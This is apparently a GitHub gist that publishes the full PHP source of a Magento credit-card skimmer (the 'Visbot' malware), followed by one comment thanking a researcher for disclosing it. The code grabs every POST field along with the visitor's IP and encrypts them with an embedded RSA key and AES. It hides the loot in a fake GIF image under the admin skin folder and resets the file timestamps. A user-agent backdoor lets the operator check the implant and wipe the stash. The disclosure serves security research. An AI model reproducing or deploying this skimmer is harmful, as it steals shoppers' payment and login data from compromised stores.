| <?PHP | |
| $y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif'; | |
| $m1 = '1382961301'; | |
| $k2 = 'pa89785e'; | |
| $k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----"; | |
| if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') { | |
| if (isset($_GET[$k2])) { | |
| $m1 = file_exists($y0) ? @filemtime($y0) : $m1; | |
| @file_put_contents($y0, ''); | |
| @touch($y0, $m1, $m1); | |
| echo 'clean ok'; | |
| } else | |
| echo 'Pong'; | |
| exit; | |
| } | |
| if (!empty($_SERVER['HTTP_CLIENT_IP'])) { | |
| $i4 = $_SERVER['HTTP_CLIENT_IP']; | |
| } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { | |
| $i4 = $_SERVER['HTTP_X_FORWARDED_FOR']; | |
| } else { | |
| $i4 = @$_SERVER['REMOTE_ADDR']; | |
| } | |
| if (isset($_POST) && sizeof($_POST)) { | |
| $a5 = ''; | |
| foreach ($_POST as $h6 => $n7) { | |
| if (is_array($n7)) { | |
| foreach ($n7 as $f8 => $l9) { | |
| if (is_array($l9)) { | |
| foreach ($l9 as $l10 => $v11) { | |
| if (is_array($v11)) { | |
| ; | |
| } else { | |
| $a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11; | |
| } | |
| } | |
| } else { | |
| $a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9; | |
| } | |
| } | |
| } else { | |
| $a5 .= ':' . $h6 . '=' . $n7; | |
| } | |
| } | |
| $a5 = $i4 . $a5; | |
| } else { | |
| $a5 = null; | |
| } | |
| if ($a5) { | |
| $t12 = false; | |
| if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) { | |
| $t12 = true; | |
| } elseif (function_exists('dl')) { | |
| $n13 = strtolower(substr(php_uname(), 0, 3)); | |
| $d14 = 'php_openssl.' . ($n13 == 'win' ? 'dll' : 'so'); | |
| @dl($d14); | |
| if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists('openssl_encrypt')) { | |
| $t12 = true; | |
| } | |
| } | |
| if ($t12) { | |
| $t15 = @openssl_get_publickey($k3); | |
| $q16 = 128; | |
| $t17 = ''; | |
| $h18 = md5(md5(microtime()) . rand()); | |
| $e19 = $h18; | |
| while ($e19) { | |
| $f20 = substr($e19, 0, $q16); | |
| $e19 = substr($e19, $q16); | |
| @openssl_public_encrypt($f20, $h21, $t15); | |
| $t17 .= $h21; | |
| } | |
| $t22 = @openssl_encrypt($a5, 'aes128', $h18); | |
| @openssl_free_key($t15); | |
| $a5 = $t17 . ':::SEP:::' . $t22; | |
| } | |
| $m1 = file_exists($y0) ? @filemtime($y0) : $m1; | |
| @file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND); | |
| @touch($y0, $m1, $m1); | |
| } | |
| ?><?php |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
ngctombs commentedDec 2, 2016
Thank you for publicizing this Willem, keep up the great research work!